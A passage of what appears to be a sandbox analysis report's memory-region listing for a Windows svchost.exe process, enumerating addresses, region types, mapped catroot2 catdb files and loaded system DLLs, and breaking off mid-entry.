"catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 14695 start_va = 0xadbd9a0000 end_va = 0xadbd9affff entry_point = 0xadbd9a0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 14696 start_va = 0xadbd9b0000 end_va = 0xadbd9b6fff entry_point = 0x0 region_type = private name = "private_0x000000adbd9b0000" filename = "" Region: id = 14697 start_va = 0xadbd9c0000 end_va = 0xadbd9c6fff entry_point = 0x0 region_type = private name = "private_0x000000adbd9c0000" filename = "" Region: id = 14698 start_va = 0xadbd9d0000 end_va = 0xadbd9dffff entry_point = 0xadbd9d0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 14699 start_va = 0xadbd9e0000 end_va = 0xadbd9effff entry_point = 0xadbd9e0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 14700 start_va = 0xadbd9f0000 end_va = 0xadbd9fffff entry_point = 0xadbd9f0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 14701 start_va = 0xadbda00000 end_va = 0xadbdafffff entry_point = 0x0 region_type = private name = "private_0x000000adbda00000" filename = "" Region: id = 14702 start_va = 0xadbdb00000 end_va = 0xadbdbfffff entry_point = 0x0 region_type = private name = "private_0x000000adbdb00000" filename = "" Region: id = 14703 start_va = 0xadbdc00000 end_va = 0xadbdcfffff entry_point = 0x0 region_type = private name = "private_0x000000adbdc00000" filename = "" Region: id = 14704 start_va = 0xadbdd00000 end_va = 0xadbddc1fff entry_point = 0x0 region_type = private name = "private_0x000000adbdd00000" filename = "" Region: id = 14705 start_va = 0xadbddd0000 end_va = 0xadbdddffff entry_point = 0xadbddd0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 14706 start_va = 0xadbdde0000 end_va = 0xadbddeffff entry_point = 0xadbdde0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 14707 start_va = 0xadbddf0000 end_va = 0xadbddfffff entry_point = 0xadbddf0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 14708 start_va = 0xadbde00000 end_va = 0xadbde0ffff entry_point = 0xadbde00000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 14709 start_va = 0xadbde10000 end_va = 0xadbde1ffff entry_point = 0xadbde10000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 14710 start_va = 0xadbde20000 end_va = 0xadbde2ffff entry_point = 0xadbde20000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 14711 start_va = 0xadbde30000 end_va = 0xadbde3ffff entry_point = 0xadbde30000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 14712 start_va = 0xadbde40000 end_va = 0xadbde4ffff entry_point = 0xadbde40000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 14713 start_va = 0xadbde50000 end_va = 0xadbde5ffff entry_point = 0xadbde50000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 14714 start_va = 0xadbde60000 end_va = 0xadbde6ffff entry_point = 0xadbde60000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 14715 start_va = 0xadbde70000 end_va = 0xadbde7ffff entry_point = 0xadbde70000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 14716 start_va = 0xadbde80000 end_va = 0xadbde80fff entry_point = 0x0 region_type = private name = "private_0x000000adbde80000" filename = "" Region: id = 14717 start_va = 0xadbde90000 end_va = 0xadbde96fff entry_point = 0x0 region_type = private name = "private_0x000000adbde90000" filename = "" Region: id = 14718 start_va = 0xadbdea0000 end_va = 0xadbdeaffff entry_point = 0xadbdea0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 14719 start_va = 0xadbdeb0000 end_va = 0xadbdebffff entry_point = 0xadbdeb0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 14720 start_va = 0xadbdec0000 end_va = 0xadbdecffff entry_point = 0xadbdec0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{127d0a1d-4ef2-11d1-8608-00c04fc295ee}\\catdb") Region: id = 14721 start_va = 0xadbded0000 end_va = 0xadbded0fff entry_point = 0x0 region_type = private name = "private_0x000000adbded0000" filename = "" Region: id = 14722 start_va = 0xadbdee0000 end_va = 0xadbdeeffff entry_point = 0xadbdee0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 14723 start_va = 0xadbdef0000 end_va = 0xadbdefffff entry_point = 0xadbdef0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 14724 start_va = 0xadbdf00000 end_va = 0xadbdffffff entry_point = 0x0 region_type = private name = "private_0x000000adbdf00000" filename = "" Region: id = 14725 start_va = 0xadbe000000 end_va = 0xadbe0fffff entry_point = 0x0 region_type = private name = "private_0x000000adbe000000" filename = "" Region: id = 14726 start_va = 0xadbe100000 end_va = 0xadbe1fffff entry_point = 0x0 region_type = private name = "private_0x000000adbe100000" filename = "" Region: id = 14727 start_va = 0xadbe200000 end_va = 0xadbe2fffff entry_point = 0x0 region_type = private name = "private_0x000000adbe200000" filename = "" Region: id = 14728 start_va = 0xadbe300000 end_va = 0xadbe3fffff entry_point = 0x0 region_type = private name = "private_0x000000adbe300000" filename = "" Region: id = 14729 start_va = 0xadbe400000 end_va = 0xadbe4fffff entry_point = 0x0 region_type = private name = "private_0x000000adbe400000" filename = "" Region: id = 14730 start_va = 0xadbe500000 end_va = 0xadbe5fffff entry_point = 0x0 region_type = private name = "private_0x000000adbe500000" filename = "" Region: id = 14731 start_va = 0xadbe600000 end_va = 0xadbe6fffff entry_point = 0x0 region_type = private name = "private_0x000000adbe600000" filename = "" Region: id = 14732 start_va = 0xadbe700000 end_va = 0xadbe7fffff entry_point = 0x0 region_type = private name = "private_0x000000adbe700000" filename = "" Region: id = 14733 start_va = 0xadbe800000 end_va = 0xadbe8fffff entry_point = 0x0 region_type = private name = "private_0x000000adbe800000" filename = "" Region: id = 14734 start_va = 0xadbe900000 end_va = 0xadbe9fffff entry_point = 0x0 region_type = private name = "private_0x000000adbe900000" filename = "" Region: id = 14735 start_va = 0xadbea00000 end_va = 0xadbeafffff entry_point = 0x0 region_type = private name = "private_0x000000adbea00000" filename = "" Region: id = 14736 start_va = 0xadbeb00000 end_va = 0xadbebfffff entry_point = 0x0 region_type = private name = "private_0x000000adbeb00000" filename = "" Region: id = 14737 start_va = 0xadbec00000 end_va = 0xadbfbfffff entry_point = 0x0 region_type = private name = "private_0x000000adbec00000" filename = "" Region: id = 14738 start_va = 0xadbfc00000 end_va = 0xadbfe0ffff entry_point = 0x0 region_type = private name = "private_0x000000adbfc00000" filename = "" Region: id = 14739 start_va = 0xadbfe10000 end_va = 0xadcfe0ffff entry_point = 0x0 region_type = private name = "private_0x000000adbfe10000" filename = "" Region: id = 14740 start_va = 0xadcfe10000 end_va = 0xaddfe0ffff entry_point = 0x0 region_type = private name = "private_0x000000adcfe10000" filename = "" Region: id = 14741 start_va = 0xaddfe10000 end_va = 0xaddfe8ffff entry_point = 0x0 region_type = private name = "private_0x000000addfe10000" filename = "" Region: id = 14742 start_va = 0xaddfe90000 end_va = 0xadefe8ffff entry_point = 0x0 region_type = private name = "private_0x000000addfe90000" filename = "" Region: id = 14743 start_va = 0xadefe90000 end_va = 0xadffe8ffff entry_point = 0x0 region_type = private name = "private_0x000000adefe90000" filename = "" Region: id = 14744 start_va = 0xadffe90000 end_va = 0xadffe9ffff entry_point = 0xadffe90000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 14745 start_va = 0xadffea0000 end_va = 0xadffeaffff entry_point = 0xadffea0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 14746 start_va = 0xadffeb0000 end_va = 0xadffebffff entry_point = 0xadffeb0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 14747 start_va = 0xadffec0000 end_va = 0xadffecffff entry_point = 0xadffec0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 14748 start_va = 0xadffed0000 end_va = 0xadffedffff entry_point = 0xadffed0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 14749 start_va = 0xadffee0000 end_va = 0xadffeeffff entry_point = 0xadffee0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 14750 start_va = 0xadffef0000 end_va = 0xadffefffff entry_point = 0xadffef0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 14751 start_va = 0xadfff00000 end_va = 0xadfff0ffff entry_point = 0xadfff00000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 14752 start_va = 0xadfff10000 end_va = 0xadfff1ffff entry_point = 0xadfff10000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 14753 start_va = 0xadfff20000 end_va = 0xadfff2ffff entry_point = 0xadfff20000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 14754 start_va = 0xadfff30000 end_va = 0xadfff3ffff entry_point = 0xadfff30000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 14755 start_va = 0xadfff40000 end_va = 0xadfff4ffff entry_point = 0xadfff40000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 14756 start_va = 0xadfff50000 end_va = 0xadfff5ffff entry_point = 0xadfff50000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 14757 start_va = 0xadfff60000 end_va = 0xadfff6ffff entry_point = 0xadfff60000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 14758 start_va = 0xadfff70000 end_va = 0xadfff7ffff entry_point = 0xadfff70000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 14759 start_va = 0xadfff80000 end_va = 0xadfff8ffff entry_point = 0xadfff80000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 14760 start_va = 0xadfff90000 end_va = 0xadfff9ffff entry_point = 0xadfff90000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 14761 start_va = 0xadfffa0000 end_va = 0xadfffaffff entry_point = 0xadfffa0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 14762 start_va = 0xadfffb0000 end_va = 0xadfffbffff entry_point = 0xadfffb0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 14763 start_va = 0xadfffc0000 end_va = 0xadfffcffff entry_point = 0xadfffc0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 14764 start_va = 0x7df5ff9e0000 end_va = 0x7ff5ff9dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff9e0000" filename = "" Region: id = 14765 start_va = 0x7ff7b332c000 end_va = 0x7ff7b332dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b332c000" filename = "" Region: id = 14766 start_va = 0x7ff7b332e000 end_va = 0x7ff7b332ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b332e000" filename = "" Region: id = 14767 start_va = 0x7ff7b3330000 end_va = 0x7ff7b3331fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3330000" filename = "" Region: id = 14768 start_va = 0x7ff7b3332000 end_va = 0x7ff7b3333fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3332000" filename = "" Region: id = 14769 start_va = 0x7ff7b3334000 end_va = 0x7ff7b3335fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3334000" filename = "" Region: id = 14770 start_va = 0x7ff7b3336000 end_va = 0x7ff7b3337fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3336000" filename = "" Region: id = 14771 start_va = 0x7ff7b3338000 end_va = 0x7ff7b3339fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3338000" filename = "" Region: id = 14772 start_va = 0x7ff7b333a000 end_va = 0x7ff7b333bfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b333a000" filename = "" Region: id = 14773 start_va = 0x7ff7b333c000 end_va = 0x7ff7b333dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b333c000" filename = "" Region: id = 14774 start_va = 0x7ff7b333e000 end_va = 0x7ff7b333ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b333e000" filename = "" Region: id = 14775 start_va = 0x7ff7b3340000 end_va = 0x7ff7b3341fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3340000" filename = "" Region: id = 14776 start_va = 0x7ff7b3342000 end_va = 0x7ff7b3343fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3342000" filename = "" Region: id = 14777 start_va = 0x7ff7b3344000 end_va = 0x7ff7b3345fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3344000" filename = "" Region: id = 14778 start_va = 0x7ff7b3346000 end_va = 0x7ff7b3347fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3346000" filename = "" Region: id = 14779 start_va = 0x7ff7b334a000 end_va = 0x7ff7b334bfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b334a000" filename = "" Region: id = 14780 start_va = 0x7ff7b334c000 end_va = 0x7ff7b334dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b334c000" filename = "" Region: id = 14781 start_va = 0x7ff7b334e000 end_va = 0x7ff7b334ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b334e000" filename = "" Region: id = 14782 start_va = 0x7ff7b3350000 end_va = 0x7ff7b344ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7b3350000" filename = "" Region: id = 14783 start_va = 0x7ff7b3450000 end_va = 0x7ff7b3472fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7b3450000" filename = "" Region: id = 14784 start_va = 0x7ff7b3473000 end_va = 0x7ff7b3474fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3473000" filename = "" Region: id = 14785 start_va = 0x7ff7b3475000 end_va = 0x7ff7b3476fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3475000" filename = "" Region: id = 14786 start_va = 0x7ff7b3477000 end_va = 0x7ff7b3477fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3477000" filename = "" Region: id = 14787 start_va = 0x7ff7b3478000 end_va = 0x7ff7b3479fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3478000" filename = "" Region: id = 14788 start_va = 0x7ff7b347a000 end_va = 0x7ff7b347bfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b347a000" filename = "" Region: id = 14789 start_va = 0x7ff7b347c000 end_va = 0x7ff7b347dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b347c000" filename = "" Region: id = 14790 start_va = 0x7ff7b347e000 end_va = 0x7ff7b347ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b347e000" filename = "" Region: id = 14791 start_va = 0x7ff7b3dc0000 end_va = 0x7ff7b3dccfff entry_point = 0x7ff7b3dc0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 14792 start_va = 0x7ffbf25b0000 end_va = 0x7ffbf262ffff entry_point = 0x7ffbf25b0000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 14793 start_va = 0x7ffbf7160000 end_va = 0x7ffbf7441fff entry_point = 0x7ffbf7160000 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 14794 start_va = 0x7ffbf9250000 end_va = 0x7ffbf9264fff entry_point = 0x7ffbf9250000 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 14795 start_va = 0x7ffbf99c0000 end_va = 0x7ffbf9a1efff entry_point = 0x7ffbf99c0000 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 14796 start_va = 0x7ffbf9b00000 end_va = 0x7ffbf9b14fff entry_point = 0x7ffbf9b00000 region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 14797 start_va = 0x7ffbf9cb0000 end_va = 0x7ffbf9d0efff entry_point = 0x7ffbf9cb0000 region_type = mapped_file name = "ncsi.dll" filename = "\\Windows\\System32\\ncsi.dll" (normalized: "c:\\windows\\system32\\ncsi.dll") Region: id = 14798 start_va = 0x7ffbf9d10000 end_va = 0x7ffbf9d6ffff entry_point = 0x7ffbf9d10000 region_type = mapped_file name = "nlasvc.dll" filename = "\\Windows\\System32\\nlasvc.dll" (normalized: "c:\\windows\\system32\\nlasvc.dll") Region: id = 14799 start_va = 0x7ffbf9d80000 end_va = 0x7ffbf9d9bfff entry_point = 0x7ffbf9d80000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 14800 start_va = 0x7ffbf9da0000 end_va = 0x7ffbf9db7fff entry_point = 0x7ffbf9da0000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 14801 start_va = 0x7ffbf9dc0000 end_va = 0x7ffbf9f42fff entry_point = 0x7ffbf9dc0000 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 14802 start_va = 0x7ffbfadc0000 end_va = 0x7ffbfade3fff entry_point = 0x7ffbfadc0000 region_type = mapped_file name = "cryptcatsvc.dll" filename = "\\Windows\\System32\\cryptcatsvc.dll" (normalized: "c:\\windows\\system32\\cryptcatsvc.dll") Region: id = 14803 start_va = 0x7ffbfadf0000 end_va = 0x7ffbfae02fff entry_point = 0x7ffbfadf0000 region_type = mapped_file name = "crypttpmeksvc.dll" filename = "\\Windows\\System32\\crypttpmeksvc.dll" (normalized: "c:\\windows\\system32\\crypttpmeksvc.dll") Region: id = 14804 start_va = 0x7ffbfae10000 end_va = 0x7ffbfae26fff entry_point = 0x7ffbfae10000 region_type = mapped_file name = "cryptsvc.dll" filename = "\\Windows\\System32\\cryptsvc.dll" (normalized: "c:\\windows\\system32\\cryptsvc.dll") Region: id = 14805 start_va = 0x7ffbfbb40000 end_va = 0x7ffbfbc15fff entry_point = 0x7ffbfbb40000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 14806 start_va = 0x7ffbfc6e0000 end_va = 0x7ffbfc728fff entry_point = 0x7ffbfc6e0000 region_type = mapped_file name = "wkssvc.dll" filename = "\\Windows\\System32\\wkssvc.dll" (normalized: "c:\\windows\\system32\\wkssvc.dll") Region: id = 14807 start_va = 0x7ffbfcde0000 end_va = 0x7ffbfcdf7fff entry_point = 0x7ffbfcde0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 14808 start_va = 0x7ffbfcec0000 end_va = 0x7ffbfcec9fff entry_point = 0x7ffbfcec0000 region_type = mapped_file name = "dnsext.dll" filename = "\\Windows\\System32\\dnsext.dll" (normalized: "c:\\windows\\system32\\dnsext.dll") Region: id = 14809 start_va = 0x7ffbfced0000 end_va = 0x7ffbfcf37fff entry_point = 0x7ffbfced0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 14810 start_va = 0x7ffbfcf50000 end_va = 0x7ffbfcf98fff entry_point = 0x7ffbfcf50000 region_type = mapped_file name = "dnsrslvr.dll" filename = "\\Windows\\System32\\dnsrslvr.dll" (normalized: "c:\\windows\\system32\\dnsrslvr.dll") Region: id = 14811 start_va = 0x7ffbfcfa0000 end_va = 0x7ffbfcfb9fff entry_point = 0x7ffbfcfa0000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 14812 start_va = 0x7ffbfcfc0000 end_va = 0x7ffbfcfd5fff entry_point = 0x7ffbfcfc0000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 14813 start_va = 0x7ffbfd310000 end_va = 0x7ffbfd33cfff entry_point = 0x7ffbfd310000 region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 14814 start_va = 0x7ffbfd340000 end_va = 0x7ffbfd355fff entry_point = 0x7ffbfd340000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 14815 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 14816 start_va = 0x7ffbfd810000 end_va = 0x7ffbfd820fff entry_point = 